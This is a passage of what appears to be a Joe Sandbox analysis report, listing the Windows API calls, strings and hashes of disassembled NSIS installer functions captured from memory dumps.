Part of subcall function 004037CE: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,75A83410), ref: 004038BE
Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
Part of subcall function 004037CE: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403925
Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962

Part of subcall function 004036F4: CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
ExitProcess.KERNEL32 ref: 0040354C
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
OpenProcessToken.ADVAPI32(00000000), ref: 00403670
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
ExitProcess.KERNEL32 ref: 004036EE

Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717

Strings

TEMP, xrefs: 0040345C
\Temp, xrefs: 0040342E
NSIS Error, xrefs: 004032CF
", xrefs: 0040333F
SeShutdownPrivilege, xrefs: 00403682
Low, xrefs: 0040344A
.tmp, xrefs: 00403573
TMP, xrefs: 00403464
~nsu, xrefs: 00403557
Error launching installer, xrefs: 004034E3
UXTHEME, xrefs: 0040325E, 00403263, 00403269

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-3048946811
Opcode ID: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
Opcode Fuzzy Hash: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

Function 00404A44 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A5C
GetDlgItem.USER32(?,00000408), ref: 00404A67
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
LoadBitmapA.USER32(0000006E), ref: 00404AC4
SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
DeleteObject.GDI32(00000000), ref: 00404B3A
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
GetWindowLongA.USER32(?,000000F0), ref: 00404C74
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
ShowWindow.USER32(?,00000005), ref: 00404C93
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
ImageList_Destroy.COMCTL32(?), ref: 00404E63
GlobalFree.KERNEL32(?), ref: 00404E73
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
InvalidateRect.USER32(?,00000000,?), ref: 00404FC4
ShowWindow.USER32(?,00000000), ref: 00405012
GetDlgItem.USER32(?,000003FE), ref: 0040501D
ShowWindow.USER32(00000000), ref: 00405024

Strings

N, xrefs: 00404CCE
M, xrefs: 00404BED
, xrefs: 00404FFC

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
Opcode Fuzzy Hash: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58

Function 00405768 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,75A83410,00436400,00000000), ref: 00405791
lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,75A83410,00436400,00000000), ref: 004057D9
lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,75A83410,00436400,00000000), ref: 004057FA
lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,75A83410,00436400,00000000), ref: 00405800
FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,75A83410,00436400,00000000), ref: 00405811
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
FindClose.KERNEL32(00000000), ref: 004058CF

Strings

\*.*, xrefs: 004057D3

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69

Function 375F3750 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$q, xrefs: 375F3C09
$q, xrefs: 375F387D
$q, xrefs: 375F3CA8
$q, xrefs: 375F3CBE
$q, xrefs: 375F384C
$q, xrefs: 375F3840
$q, xrefs: 375F3871
$q, xrefs: 375F3C9C
$q, xrefs: 375F3BFD
$q, xrefs: 375F3CB2

Memory Dump Source

Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-1298971921
Opcode ID: ddef6bf87dc04637dbfadae52ea43e828eb5d1e5f4dd89b98cb8d4dd66b60aea
Instruction ID: b328d2b551ec1382f2047d98cb56c66e0f46249a25be08ab58497ad5f533b361
Opcode Fuzzy Hash: ddef6bf87dc04637dbfadae52ea43e828eb5d1e5f4dd89b98cb8d4dd66b60aea
Instruction Fuzzy Hash: 4F125B34A01319CFEB18DFA5C850B9EB7F2BF89350F20856AD40AAB255DB359D85CF80

Function 00405205 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405264
GetDlgItem.USER32(?,000003EE), ref: 00405273
GetClientRect.USER32(?,?), ref: 004052B0
GetSystemMetrics.USER32(00000002), ref: 004052B7
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
ShowWindow.USER32(?,00000008), ref: 00405353
GetDlgItem.USER32(?,000003EC), ref: 00405374
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
GetDlgItem.USER32(?,000003F8), ref: 00405282

Part of subcall function 00404074: SendMessageA.USER32(00000028,?,?,00403EA4), ref: 00404082

GetDlgItem.USER32(?,000003EC), ref: 004053C5
CreateThread.KERNEL32(00000000,00000000,Function_00005199,00000000), ref: 004053D3
CloseHandle.KERNEL32(00000000), ref: 004053DA
ShowWindow.USER32(00000000), ref: 004053FD
ShowWindow.USER32(?,00000008), ref: 00405404
ShowWindow.USER32(00000008), ref: 0040544A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
CreatePopupMenu.USER32 ref: 0040548F
AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054A4
GetWindowRect.USER32(?,000000FF), ref: 004054C4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
OpenClipboard.USER32(00000000), ref: 00405529
EmptyClipboard.USER32 ref: 0040552F
GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
GlobalLock.KERNEL32(00000000), ref: 00405542
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
GlobalUnlock.KERNEL32(00000000), ref: 0040556F
SetClipboardData.USER32(?,00000000), ref: 0040557A
CloseClipboard.USER32 ref: 00405580

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
Opcode Fuzzy Hash: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

Function 00403B6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
ShowWindow.USER32(?), ref: 00403BC4
DestroyWindow.USER32 ref: 00403BD8
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
GetDlgItem.USER32(?,?), ref: 00403C15
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
IsWindowEnabled.USER32(00000000), ref: 00403C30
GetDlgItem.USER32(?,?), ref: 00403CDE
GetDlgItem.USER32(?,00000002), ref: 00403CE8
SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D53
GetDlgItem.USER32(?,00000003), ref: 00403DF9
ShowWindow.USER32(00000000,?), ref: 00403E1A
EnableWindow.USER32(?,?), ref: 00403E2C
EnableWindow.USER32(?,?), ref: 00403E47
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E5D
EnableMenuItem.USER32(00000000), ref: 00403E64
SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E7C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EB9
SetWindowTextA.USER32(?,0042A870), ref: 00403EC8
ShowWindow.USER32(?,0000000A), ref: 00403FFC

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
Opcode Fuzzy Hash: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

Function 004037CE Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

lstrcatA.KERNEL32(00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,75A83410,00436400,00435000,00000000), ref: 00403849
lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,75A83410), ref: 004038BE
lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403925

Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B

RegisterClassA.USER32(0042EBA0), ref: 00403962
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
ShowWindow.USER32(00000005,00000000), ref: 004039E5
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
RegisterClassA.USER32(0042EBA0), ref: 00403A27
DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46

Strings

RichEdit20A, xrefs: 00403A09, 00403A0F
Control Panel\Desktop\ResourceLocale, xrefs: 00403802
RichEdit, xrefs: 00403A18
.exe, xrefs: 004038CB
RichEd32, xrefs: 004039F9
_Nb, xrefs: 00403941, 004039A9
RichEd20, xrefs: 004039EB
.DEFAULT\Control Panel\International, xrefs: 00403834

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2904746566
Opcode ID: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
Opcode Fuzzy Hash: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

Function 004041AA Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404235
GetDlgItem.USER32(00000000,000003E8), ref: 00404249
SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404267
GetSysColor.USER32(?), ref: 00404278
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
lstrlenA.KERNEL32(?), ref: 00404299
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
GetDlgItem.USER32(?,0000040A), ref: 0040431F
SendMessageA.USER32(00000000), ref: 00404322
GetDlgItem.USER32(?,000003E8), ref: 0040434D
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
SetCursor.USER32(00000000), ref: 004043A5
LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
SetCursor.USER32(00000000), ref: 004043BE
SendMessageA.USER32(00000111,?,00000000), ref: 004043EA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE

Strings

N, xrefs: 0040433B
uA@, xrefs: 004043A9

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$uA@
API String ID: 3103080414-3275078707
Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,0042EC00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Function 00405C0F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49

Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
wsprintfA.USER32 ref: 00405C84
GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
GlobalFree.KERNEL32(00000000), ref: 00405D6D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74

Part of subcall function 00405B39: GetFileAttributesA.KERNEL32(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F

Strings

%s=%s, xrefs: 00405C7A
[Rename], xrefs: 00405CEE, 00405D00

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
Opcode Fuzzy Hash: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD

Function 004044D1 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404520
SetWindowTextA.USER32(00000000,?), ref: 0040454A
SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
CoTaskMemFree.OLE32(00000000), ref: 00404606
lstrcmpiA.KERNEL32(0042E3A0,0042A870), ref: 00404638
lstrcatA.KERNEL32(?,0042E3A0), ref: 00404644
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656

Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3

Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
Part of subcall function 0040620A: CharNextA.USER32(?,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
Part of subcall function 0040620A: CharPrevA.USER32(?,?,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284

GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,?,00429840,?,?,000003FB,?), ref: 00404714
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F

Part of subcall function 00404888: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
Part of subcall function 00404888: SetDlgItemTextA.USER32(?,0042A870), ref: 00404941

Strings

A, xrefs: 004045F4

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
